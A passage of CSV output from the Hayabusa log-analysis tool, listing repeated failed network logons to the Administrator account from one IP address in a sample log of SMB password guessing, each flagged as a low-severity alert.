NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j2AbE9D8PvuFDBz5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:25.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wzWdLEEc68ZvviGh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.030 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AtV3BuZiljbAeikO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tnKKfcwikNDdYOam : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jSbbzD7fpJY4Q1JL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gOASpLLE25ruCnGW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1jhUGOtszbPUwccL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.271 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yB8Mzo1RppdpLFKS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rOwoUlHGVeSbAhuN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BXIEHbkrjwedeaih : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OvsKoixgEzUgAyie : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TzaZe6Y4Tdfjseuk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.555 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FEmbuU3CAC3CecZy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kfBmqmVPd0CGVUsD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Uz3TlU6yrcveM1w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z6hH6AkkgBFmeZ6u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J2J1W2WhA6Pj7j5j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: soHOxnkoOn7ot0My : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4c2oWI6mRIvSVSKq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FKsXD8aTyaC4fBqq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qrzji5ucmutsZNpo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BApOU105FCLwj4zn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:26.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EO50f7NfrrdwwCNA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PfTYbWC8IjW87th8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wLnE6zm5US4maK04 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5AV7taC7hYQdVjAj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8MnnaSRs0bnYVlMX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YgqavZ1SuNvX7RgH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.247 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IQvoIsfW0LhDit2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 33IPGQXc1MarY30J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: II4Ly9LnkWlq60Ux : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wncfJC7kDSI7O9Ud : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6XzbWef3PuzQK3FJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5M5670HdNC6c8O56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ea8FcddgLyV5o6oL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LjyhmKFdBNrHIvTJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PIF47pEWBMp6Nbym : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6TO891WvJPkdjsct : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6cLnJYpHEzGAvhWG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gy6cFTrwrpRQFxfQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gxz612Z88PMCKzAk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GSPC8hibdZdyOcex : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.893 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6vlmykLeFmuhn81B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4w4lEW9w53zMFPcc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.970 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jt2lDRFWwi6adwlB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G9MGvle35u5OGB5o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJgLFM2vrnKuj5N3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l8HRyDAzwKj9bfnA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J65LcwnRgEob9wjY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yhas9e1fwDZ1Fxvt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5qJRSpjS6tZJjNQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bo4HAgP2tw0GmZ4o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zv0cbLCD7E05i0g5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FIKsQLk5iPyKoeqM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.394 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RiHAaBszJBGe2deQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8em4eOiqze683Cj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86lXQsnn7dae93tW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Iu8olNGPmhxh6iNu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qZYtN5EMHxcNqID6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mtUQGxrMoPkpUQCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QYh4e3bpePhDoRwr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UkC8E9uKpCgD1BHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ZCDxpmDZbpGCey3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SS2dxS3WvCrAyiB2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YT3VHxKNf8q14rro : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fx9HQT3u3Ig6vJ3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FukPQsr4SXRshyTn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7AutKUyPELNRUcA4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 38gBkWcYdZW6Wcdz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HMKnLRQCDn1CHZdH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ShGnRYHfVSuPvfcX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LXVWG3Yl0utv98Zf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VDfa0UebgleQMK5U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxTLJJsWs9dOc5JC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x7cKtymmsQJSM6zZ : IP Address: 192.168.198.149 : AuthPackage: 